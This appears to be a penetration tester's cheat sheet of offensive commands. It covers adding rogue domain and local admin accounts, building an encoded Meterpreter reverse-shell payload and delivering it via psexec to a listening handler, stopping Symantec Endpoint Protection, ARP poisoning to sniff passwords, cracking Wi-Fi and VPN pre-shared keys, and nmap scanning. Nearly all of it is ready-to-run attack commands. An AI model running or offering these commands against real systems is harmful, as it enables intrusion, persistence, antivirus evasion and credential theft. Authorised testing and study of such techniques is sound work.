These are various tips and tricks I have found useful on my pentest engagements. Most of these can be found using Google but I decided to put them in a central location to make them easily accessible. Hope they are as helpful to you as they are to me.
To mount an SMB share using a null session do one of the following depending on the OS you are using.
Windows> net use x: \\server\share "" /u:
Linux> mount -t cifs //server/share -o username=,password= /mnt/point
To mount an NFS share on Linux use.
mount -t nfs server:/share /mnt/point
Add a new Windows domain admin account.
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
Add a new Windows local admin account.
net user username password /ADD
net localgroup Administrators username /ADD
Add a new linux account and put them in the wheel group.
useradd -G wheel username && echo "username:newpass"|chpasswd
If you get the error, "stdapi_sys_process_execute: Operation failed: 1314", while trying to drop to as shell in meterpreter, try the code below. This is a known bug in meterpreter.
execute -f cmd.exe -c -i -H
The first thing we need to do is generate a custom executable to use with Meterpreter.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe
Next we need to setup a multi handler to listen for connections.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...
In another msfconsole session we need to configure the psexec exploit module to use our custom executable.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe
Finally, we need to run the exploit. If everything worked then you should see a new meterpreter session open in multi/handler
msf exploit(psexec) > exploit
This command will disable Symantec Endpoint Protection. I find it useful when I have a basic shell on a box and want to upgrade to Meterpreter but Symantec stops me.
c:\program files\symantec\symantec endpoint protection\smc -stop
Ettercap allows us to do arp poisoning and sniff plaintext passwords.
ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap
Use JtR to generate candidate passwords for aircrack-ng
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
Use Hashcat to generate candidate passwords for aircrack-ng
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
If you’ve never done this, read these first. http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html
To find aggressive mode VPNS use ike-scan.
ike-scan -A 192.168.1.0/24
If the default transforms don't work use the generate_transforms.sh script from the user guide above.
generate-transforms.sh | xargs --max-lines=8 ike-scan 10.0.0.0/24
If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN
ike-scan 192.168.1.1 -A -id GroupVPN
Use the -P argument to save the handshake to a file, which can be used by psk-crack.
ike-scan 192.168.1.1 -A -Ppsk_192.168.1.1.txt
Use a dictionary to crack the pre-shared key.
psk-crack -d /path/to/dictionary psk_192.168.1.1.txt
Discovery Scans:
nmap -v -n -PE <target>
nmap -v -n -PE -PO -PM -PP <target>
nmap -v -n -PS21-23,25,53,80,443,3389 -PO -PE -PM -PP <target>
Detailed TCP Scans:
nmap -v -sS -A --top-ports 10 -oA filename <target>
nmap -v -sS -A -F -oA filename <target>
nmap -v -sS -A -oA filename <target>
nmap -v -sS -A -p 1-65535 -oA filename <target>
Detailed UDP Scans:
nmap -v -sU -A --top-ports 10 -oA filename <target>
nmap -v -sU -A -F -oA filename <target>
nmap -v -sU -A -oA filename <target>
nmap -v -sU -A -p 1-65535 -oA filename <target>
I find this particularly useful for tools or scripts that operate on new line delimited list of IP addresses. I can use the simple Nmap syntax to create a file with the list of appropriate IPs.
nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt
At one point Korelogic released a set of John the Ripper rules in a john.conf file. This bash one liner would grab each ruleset and run JtR with the specified ruleset.
for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done